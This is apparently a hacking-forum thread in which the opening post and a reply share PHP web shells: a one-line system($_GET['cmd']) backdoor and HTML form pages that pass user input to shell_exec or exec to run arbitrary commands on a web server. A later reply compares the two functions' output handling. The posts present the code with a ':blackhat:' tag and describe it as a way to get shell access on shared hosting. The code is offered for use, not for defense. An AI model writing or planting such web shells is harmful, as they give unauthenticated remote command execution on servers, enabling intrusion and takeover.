Login Register






Tutorial Execute commands with a GUI. filter_list
Author
Message
Execute commands with a GUI. #1
Okay, so basically this is an improved version of:

PHP Code:
system($_GET['cmd']);

Now what does that do?
That code allows you to run shell commands on your web server, if you put that code in index.php you could do this to execute commands.

PHP Code:
index.php?cmd=ls

LS = List

Now you may not want to do it that way, you might want a specific file to do this.(the purpose of this being shared hosting doesn't give you shell access)


The code you would use is:

PHP Code:
<?php function exec_cmd(){ if (isset($_POST['command'])){ $exc = $_POST['command']; echo shell_exec($exc); } } ?> <form action='<?php echo $_SERVER["PHP_SELF"]?>' method='post'> <input type= 'text' name='command' /> <input type='submit' /> </form> <?php exec_cmd();?> <marquee behavior="slide" direction="left">Kirito's command shell.</marquee>

Now there will be a text box in the file, you can execute commands in the textbox.

:blackhat:

Reply

RE: Execute commands with a GUI. #2
Nice tutorial. Thanks for it!

Reply

RE: Execute commands with a GUI. #3
Just cleaning a little

PHP Code:
<!DOCTYPE html> <html> <head> <title>Command Execution</title> </head> <body> <form action='<?php echo $_SERVER["PHP_SELF"]?>' method='GET'> <label for='command'>Command:</label> <input type= 'text' name='command'> <input type='submit' value='Execute'> </form> <?php if(isset($_GET["command"]) && !empty($_GET["command"])) echo exec($_GET["command"]); ?> </body> </html>

Reply

RE: Execute commands with a GUI. #4
I like all the shiny colors.
[Image: Shift+Signature.png]

Reply

RE: Execute commands with a GUI. #5
(12-21-2013, 05:25 AM)Aces Wrote: Just cleaning a little

PHP Code:
<!DOCTYPE html> <html> <head> <title>Command Execution</title> </head> <body> <form action='<?php echo $_SERVER["PHP_SELF"]?>' method='GET'> <label for='command'>Command:</label> <input type= 'text' name='command'> <input type='submit' value='Execute'> </form> <?php if(isset($_GET["command"]) && !empty($_GET["command"])) echo exec($_GET["command"]); ?> </body> </html>

It's still much better to use shell_exec() over exec() because exec() doesn't provide the entire stream output like shell_exec() does, which is valuable for checking for failure or success. Sadly if you don't need the output but need the benefit of checking the return code, the suggestion is to use exec() instead. Can't just give you the best of both worlds within a single function..

Reply